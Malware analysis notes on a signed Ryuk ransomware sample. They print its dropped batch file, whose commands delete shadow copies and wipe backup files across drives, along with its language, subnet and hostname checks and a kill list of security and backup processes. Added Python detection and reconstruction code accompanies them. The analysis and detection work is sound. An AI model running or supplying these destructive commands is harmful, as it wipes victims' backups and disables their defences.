2019-06-18-ryuk-ransomware-signed-vk.notes.txt
SHA-256: 0b1008d91459937c9d103a900d8e134461db27c602a6db5e082ab9139670ccb6
Digital Certificate: WMV CONSULTING LTD (Thawte)
h/t @malwrhunterteam
Volume Shadow Copy (VSS) & Backup Kill (batch file dropped and run by the sample):
vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
del %0
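Detection logic for the command lines listed above, as an added example that is not part of the original notes or of the sample. It classifies process-creation command lines (the CommandLine field of a Sysmon event 1 or Security 4688 record) and flags the three behaviours the batch file shows: shadow deletion, shadow-storage resizing, and recursive forced deletion of backup artefacts. The events, the `VeeamBackupSvc` service name and the tag names are constructed for the example.

```python
"""Detection logic for the shadow-copy and backup destruction commands above.
Added example for these notes, not code from the sample; the events below are
constructed to resemble the CommandLine field of a process-creation event."""
from __future__ import annotations

# Extensions and name patterns the sample's batch file wipes (taken from the notes).
BACKUP_EXTS = (".vhd", ".bac", ".bak", ".wbcat", ".bkf", ".set", ".win", ".dsk")

# Constructed sample events: four from the sample's batch file, three benign-looking.
SAMPLE_EVENTS = [
    "vssadmin Delete Shadows /all /quiet",
    "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB",
    "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded",
    r"cmd.exe /c del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk",
    "vssadmin list shadows",                          # benign: read-only query
    r"cmd.exe /c del /q C:\Users\alice\notes.txt",    # benign: single file, no /s /f
    "net stop /y VeeamBackupSvc",                     # hypothetical service name
]


def _tokens(cmdline: str) -> list[str]:
    """Lower-case, whitespace-split, and strip a leading 'cmd[.exe] /c' wrapper
    so cmd built-ins such as del are seen as the command itself."""
    toks = cmdline.lower().split()
    if len(toks) >= 2 and toks[0].rsplit("\\", 1)[-1] in ("cmd", "cmd.exe") and toks[1] in ("/c", "/k"):
        toks = toks[2:]
    return toks


def classify(cmdline: str) -> list[str]:
    """Return the detection tags that fire for one command line (empty if none)."""
    tags: list[str] = []
    toks = _tokens(cmdline)
    if not toks:
        return tags
    exe = toks[0].rsplit("\\", 1)[-1].removesuffix(".exe")
    args = toks[1:]

    if exe == "vssadmin":
        if args[:2] == ["delete", "shadows"]:
            tags.append("vss_shadow_delete")
        elif args[:2] == ["resize", "shadowstorage"] and any(a.startswith("/maxsize=") for a in args):
            # Shrinking the diff area evicts existing shadows even without an explicit delete.
            tags.append("vss_shadowstorage_resize")
    elif exe == "del":
        flags = {a for a in args if a.startswith("/")}
        targets = [a for a in args if not a.startswith("/")]
        backup_targets = [t for t in targets if t.endswith(BACKUP_EXTS) or "backup*" in t]
        # Recursive, forced, quiet deletion of backup artefacts is the sample's pattern.
        if {"/s", "/f", "/q"} <= flags and backup_targets:
            tags.append("backup_file_wipe")
    elif exe == "net" and args[:1] == ["stop"]:
        svc = args[-1]
        if any(k in svc for k in ("veeam", "backup", "acronis", "sophos")):
            tags.append("backup_or_av_service_stop")
    return tags


def scan(events: list[str]) -> list[tuple[str, list[str]]]:
    """Run classify over a batch of events and keep only the ones that fired."""
    return [(e, classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for event, tags in scan(SAMPLE_EVENTS):
        print(", ".join(tags).ljust(28), event)
```

The resize rule fires on any `/maxsize=` change rather than only on `401MB`, because shrinking the diff area is what evicts the existing snapshots; the `unbounded` call that follows is just the sample restoring the limit. Correlating `vss_shadow_delete` with `backup_file_wipe` from the same parent process within a short window is what separates this from a lone admin running `vssadmin`.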
Installed language check (HKLM):
SYSTEM\CurrentControlSet\Control\Nls\Language\
InstallLanguage
0419 (Russian)
0422 (Ukrainian)
0423 (Belarusian)
ARP blacklist check (partial string match on the saved arp -a output):
\Users\Public\IPtable
arp -a >
Interface:
10.30.4
10.30.6
10.30.6
10.30.5
10.31.32
GetComputerName check (partial string match):
SPB
Spb
spb
MSK
Msk
msk
Process kill list (partial match) -> taskkill /IM /F & net stop /y:
veeam
backup
backup
xchange
dbeng
sofos
calc
ekrn
zoolz
encsvc
excel
firefoxconfig
infopath
msaccess
mspub
mydesktop
ocautoupds
ocomm
ocssd
onenote
oracle
outlook
powerpnt
sqbcoreservice
steam
synctime
tbirdconfig
thebat
thunderbird
visio
word
xfssvccon
tmlisten
pccntmon
cntaosmgr
ntrtscan
mbamtray
veeam
back
xchange
ackup
acronis
enterprise
sophos
veeam
acrsch
antivirus
antivirus
bedbg
dcagent
epsecurity
epupdate
eraser
esgshkernel
fa_scheduler
iisadmin
imap4
mbam
endpoint
afee
mcshield
task
mfemms
mfevtp
msdts
exchange
ntrt
pdvf
pop3
report
resvc
sacsvr
savadmin
sams
sdrsvc
sepmaster
monitor
smcinst
smcservice
smtp
snac
swi_
ccsf
truekey
tmlisten
ui0detect
wrsvc
netmsmq
ekrn
ehttpsrv
eshasrv
klnagent
wbengine
kavf
mfefire
hrmlog
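The host-scoping checks (installed language, ARP blacklist, computer name) and the partial-match kill list above, reconstructed as an added example that is not code from the sample. The notes record the checks but not which branch the sample takes on a match, so the functions only report which checks fired. The `arp -a` output, the tasklist, the case-insensitive matching of the kill list and the service name `VeeamBackupSvc` are constructed assumptions; the kill list here is a subset of the one in the notes.

```python
"""Reconstruction of the host-scoping checks and kill-list matching recorded in
these notes: the InstallLanguage ID check, the ARP-table prefix blacklist, the
GetComputerName substring check, and the partial-match process kill list.
Added example for the notes, not code from the sample; every input below is
constructed. The notes do not say what the sample does on a match, so the
functions only report which checks fired."""
from __future__ import annotations

# Value of HKLM\SYSTEM\CurrentControlSet\Control\Nls\Language\InstallLanguage -> name.
LANG_IDS = {"0419": "Russian", "0422": "Ukrainian", "0423": "Belarusian"}

# As listed in the notes (10.30.6 appears twice there; harmless for a substring check).
ARP_PREFIXES = ["10.30.4", "10.30.6", "10.30.6", "10.30.5", "10.31.32"]

# Only these six spellings are checked, so e.g. "SpB" would not match.
HOSTNAME_MARKERS = ["SPB", "Spb", "spb", "MSK", "Msk", "msk"]

# Subset of the notes' kill list, enough to show the partial-match behaviour.
KILL_LIST = ["veeam", "backup", "xchange", "dbeng", "sofos", "sophos", "acronis",
             "ekrn", "mbam", "mcshield", "outlook", "excel", "word", "calc",
             "tmlisten", "klnagent", "wbengine"]

# Constructed `arp -a` output, as the sample saves it to \Users\Public\IPtable,
# for a host on a blacklisted subnet.
ARP_SAMPLE = """\
Interface: 10.30.6.15 --- 0xb
  Internet Address      Physical Address      Type
  10.30.6.1             00-11-22-33-44-55     dynamic
  10.30.6.255           ff-ff-ff-ff-ff-ff     static
"""

# Constructed output for a host outside every listed prefix.
ARP_BENIGN = """\
Interface: 192.168.10.7 --- 0x4
  Internet Address      Physical Address      Type
  192.168.10.1          aa-bb-cc-dd-ee-ff     dynamic
"""

# Constructed tasklist (hypothetical image names).
TASKLIST = ["winword.exe", "excel.exe", "VeeamBackupSvc.exe", "sophos_agent.exe",
            "explorer.exe", "calc.exe", "lsass.exe", "ekrn.exe"]


def language_check(install_language: str) -> str | None:
    """Return the language name if the InstallLanguage value is on the list, else None."""
    return LANG_IDS.get(install_language.strip())


def arp_blacklisted(arp_output: str) -> list[str]:
    """Prefixes found anywhere in the arp -a text, the 'Interface:' line included.
    This is a substring match as the notes describe, so '10.30.4' also hits 10.30.40.x."""
    return sorted({p for p in ARP_PREFIXES if p in arp_output})


def hostname_check(computer_name: str) -> bool:
    """True if the GetComputerName() result contains one of the listed spellings."""
    return any(m in computer_name for m in HOSTNAME_MARKERS)


def scope_checks(install_language: str, arp_output: str, computer_name: str) -> list[str]:
    """Names of the pre-encryption checks that fire for a host."""
    fired: list[str] = []
    if language_check(install_language):
        fired.append("install_language")
    if arp_blacklisted(arp_output):
        fired.append("arp_prefix")
    if hostname_check(computer_name):
        fired.append("computer_name")
    return fired


def processes_to_kill(running: list[str]) -> list[str]:
    """Image names a partial match against the kill list selects (case-insensitive
    here by assumption); the notes say taskkill /IM /F and net stop /y follow."""
    return sorted(p for p in running if any(k in p.lower() for k in KILL_LIST))


if __name__ == "__main__":
    print(scope_checks("0419", ARP_SAMPLE, "MSK-WS12"))
    print(scope_checks("0409", ARP_BENIGN, "LON-DC1"))
    print(processes_to_kill(TASKLIST))
```

Two practical consequences of the partial matching are visible in the run: `word` in the kill list is what takes down `winword.exe`, and the ARP prefixes overmatch (`10.30.4` also covers `10.30.40.0/24`), so a hostname or subnet that merely resembles the listed ones changes the sample's behaviour on that host.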